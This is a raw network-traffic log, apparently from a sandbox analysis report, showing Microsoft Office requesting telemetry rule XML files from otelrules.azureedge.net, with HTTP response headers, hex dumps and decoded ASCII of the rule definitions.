                                                                                                              2024-12-05 09:38:47 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:47 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 958
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                              ETag: "0x8DC582BA0A31B3B"
                                                                                                              x-ms-request-id: 4927bbd2-c01e-000b-53cc-45e255000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093847Z-1746fd949bdlqd7fhC1EWR6vt000000002s0000000001v6f
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:47 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              82192.168.2.64982013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:47 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:47 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:47 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 501
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                              ETag: "0x8DC582BACFDAACD"
                                                                                                              x-ms-request-id: d1823508-801e-008c-16d3-457130000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093847Z-1746fd949bdqpttnhC1EWRe1wg000000027000000000648v
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:47 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              83192.168.2.64982113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:47 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:47 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:47 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 2592
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                              ETag: "0x8DC582BB5B890DB"
                                                                                                              x-ms-request-id: 8db94728-c01e-0034-79d1-452af6000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093847Z-1746fd949bdtlp5chC1EWRq1v400000002f00000000045ex
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:47 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              84192.168.2.64982313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:49 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:49 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:49 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 3342
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                              ETag: "0x8DC582B927E47E9"
                                                                                                              x-ms-request-id: c43eeb18-901e-008f-6ecb-4567a6000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093849Z-1746fd949bdmv56chC1EWRypnn00000002pg0000000047ze
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:49 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              85192.168.2.64982513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:49 UTC191OUTGET /rules/rule90401v3s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:50 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:50 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1250
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                              ETag: "0x8DC582BDE4487AA"
                                                                                                              x-ms-request-id: baa0a071-001e-0082-5b91-3f5880000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093850Z-1746fd949bdxk6n6hC1EWRdr8c0000000290000000007ezq
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:50 UTC1250INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              86192.168.2.64982613.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:49 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:50 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:50 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1356
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                              ETag: "0x8DC582BDC681E17"
                                                                                                              x-ms-request-id: 55cb7248-101e-0017-4fd4-4547c7000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093850Z-1746fd949bdfg4slhC1EWR34t000000002eg000000001xap
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:50 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              87192.168.2.64982713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:49 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:50 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:50 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1393
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                              ETag: "0x8DC582BE3E55B6E"
                                                                                                              x-ms-request-id: 5bdbb5de-801e-0067-47cb-45fe30000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093850Z-1746fd949bdnq7x2hC1EWRpxr000000002eg000000000szd
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:50 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              88192.168.2.64982413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:49 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:50 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:50 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 2284
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                              ETag: "0x8DC582BCD58BEEE"
                                                                                                              x-ms-request-id: dea1083a-301e-0051-14cb-4538bb000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093850Z-1746fd949bd6ztf6hC1EWRvq2s00000002200000000087zh
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:50 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              89192.168.2.64983213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:52 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:52 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:52 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1356
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                              ETag: "0x8DC582BDF66E42D"
                                                                                                              x-ms-request-id: 5ce939f7-901e-00ac-7ec7-45b69e000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093852Z-1746fd949bdtlp5chC1EWRq1v400000002hg000000001fur
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:52 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              90192.168.2.64983313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:52 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:52 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:52 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1395
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                              ETag: "0x8DC582BE017CAD3"
                                                                                                              x-ms-request-id: 4ebcc1fc-101e-0028-09cb-458f64000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093852Z-1746fd949bdlqd7fhC1EWR6vt000000002t0000000000wyp
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:52 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              91192.168.2.64983513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:52 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:52 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:52 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1395
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                              ETag: "0x8DC582BDE12A98D"
                                                                                                              x-ms-request-id: 2e27a562-801e-00a0-79cb-452196000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093852Z-1746fd949bdw2rg8hC1EWR11u400000002tg000000003qvr
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
